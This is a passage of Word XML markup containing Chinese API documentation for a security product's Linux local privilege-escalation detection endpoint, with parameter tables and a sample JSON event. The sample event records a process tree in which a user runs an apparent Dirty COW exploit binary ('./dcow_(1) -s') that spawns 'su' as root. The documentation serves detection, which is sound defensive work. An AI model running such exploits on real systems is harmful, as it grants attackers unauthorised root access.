        <w:t>注意： windows返回信息中没有linux中特有的euidUserName、fileMode、fileMode等字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5248ADA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="157" w:name="本地提权"/>
      <w:bookmarkEnd w:id="155"/>
      <w:bookmarkEnd w:id="156"/>
      <w:r>
        <w:t>本地提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493AB888" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="158" w:name="linux本地提权查询结果"/>
      <w:r>
        <w:t>Linux本地提权查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC62394" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux本地提权上报事件的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084FCD5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78865880" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/detect/localrights/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FE2008"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639"/>
        <w:gridCol w:w="1273"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="4571"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="151E65B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41FC4B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41CAC3AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AC18EDA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E921438" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="455BAE12" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A30C7E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C714853" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30F07178" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="133DCFDB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="30692EC8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6931B424" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32D8AD7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D8430CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="135148F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>发现时间，格式参考</w:t>
            </w:r>
            <w:hyperlink w:anchor="通用get请求参数类型及说明">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>通用Get请求参数类型及说明</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="359D13B6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E347C95" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E9C365F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59DEB6F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="501E4DD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4D016319" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="660A0874" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>procName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29F33417" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72222A0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23B40A71" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>提权进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="53982BD0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49438BF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>procUserName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F5CC943" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65A1DCF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DA6D077" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>提权用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FD5A873" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AC0E1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/localrights/linux?page=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA602D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C7D490" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "979f3c4d44b2e765",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "172.16.2.122",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.122",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "172.16.2.122",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 37,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了mysql或者DNSmasq",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "tianxianhu",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "time": 1529984917,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "procPid": 67537,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "procName": "su",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "procPath": "/bin/su",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "procUserName": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "procGroupName": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "procFileMode": "104755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "parentProcPid": 67533,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "parentProcName": "dcow_(1)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "parentProcPath": "/home/test/dcow_(1)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "parentProcUserName": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "parentProcGroupName": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "processTreeList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pid": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ppid": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "init",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/sbin/init",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "uid": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "userName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "groupName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "fileMode": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "euidUserName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "cmd": "/sbin/init"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pid": 1008,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ppid": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "sshd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/usr/sbin/sshd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "uid": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "userName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "groupName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "fileMode": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "euidUserName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "cmd": "/usr/sbin/sshd -D "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pid": 67477,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ppid": 1008,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "sshd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/usr/sbin/sshd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "uid": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "userName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "groupName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "fileMode": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "euidUserName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "cmd": "sshd: test [priv]    "</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pid": 67514,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ppid": 67477,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "sshd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/usr/sbin/sshd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "uid": 1000,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "userName": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "groupName": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "fileMode": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "euidUserName": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "cmd": "sshd: test@pts/0     "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pid": 67515,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ppid": 67514,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/bin/bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "uid": 1000,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "userName": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "groupName": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "fileMode": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "euidUserName": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "cmd": "-bash "</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pid": 67533,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ppid": 67515,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "dcow_(1)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/home/test/dcow_(1)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "uid": 1000,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "userName": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "groupName": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "fileMode": "100744",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "euidUserName": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "cmd": "./dcow_(1) -s "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pid": 67537,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ppid": 67533,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "su",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/bin/su",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "uid": 1000,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "userName": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "groupName": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "fileMode": "104755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "euidUserName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "cmd": "su - "</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "whiteRuleEffect": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513265DD"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2422"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="3032"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="30E36A7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57AA90D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DB4226E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22998D1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77C73905" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2533CB91" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F77C4E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50C88BF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38AE13E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="093DDC29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="10699BFA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F1535C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BBC93F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C855CED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="734A9CAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0432F201" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E917480" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D2F328E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46B36C8B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C57ED2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
